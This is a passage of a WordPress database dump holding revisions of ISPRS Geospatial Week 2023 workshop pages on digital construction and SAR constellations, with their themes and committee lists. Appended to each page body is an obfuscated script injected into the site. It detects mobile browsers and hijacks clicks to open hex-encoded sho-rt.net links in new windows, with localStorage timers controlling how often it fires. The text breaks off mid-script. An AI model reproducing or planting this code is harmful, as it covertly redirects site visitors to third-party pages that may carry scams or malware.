|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-autosave-v1','','','2023-02-05 13:56:53','2023-02-05 13:56:53','',2712,'https://gsw2023.com/?p=3815',0,'revision','',0),
(3816,1,'2023-02-05 13:57:25','2023-02-05 13:57:25','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Digital Construction</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1675605216108-156a50b7fb7c5ad86ecaddcdf8351fa4-3\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\r\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\r\n<h6><strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\r\n<h6><strong>⦁ Progress monitoring of large construction projects</strong></h6>\r\n<h6><strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\r\n<h6><strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\r\n<h6><strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\r\n<h6><strong>⦁ Computer vision in digital construction</strong></h6>\r\n<h6><strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\r\n<h6><strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\r\n[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\r\n<h6><strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\r\n<h6><strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\r\n<h6><strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\r\n<h6><strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\r\n<h6><strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\r\n<h6><strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\r\n<h6><strong>⦁ Qian Wang, Southeast University, China</strong></h6>\r\n<h6><strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\r\n<h6><strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\r\n<h6><strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\r\n<h6><strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\r\n<h6><strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\r\n<h6><strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\r\n<h6><strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\r\n<h6><strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\r\n<h6><strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\r\n<h6><strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2023-02-05 13:57:25','2023-02-05 13:57:25','',2712,'https://gsw2023.com/?p=3816',0,'revision','',0),
(3817,1,'2023-02-05 14:00:19','2023-02-05 14:00:19','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SARcon 2023 - SAR constellations and applications</span></strong></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 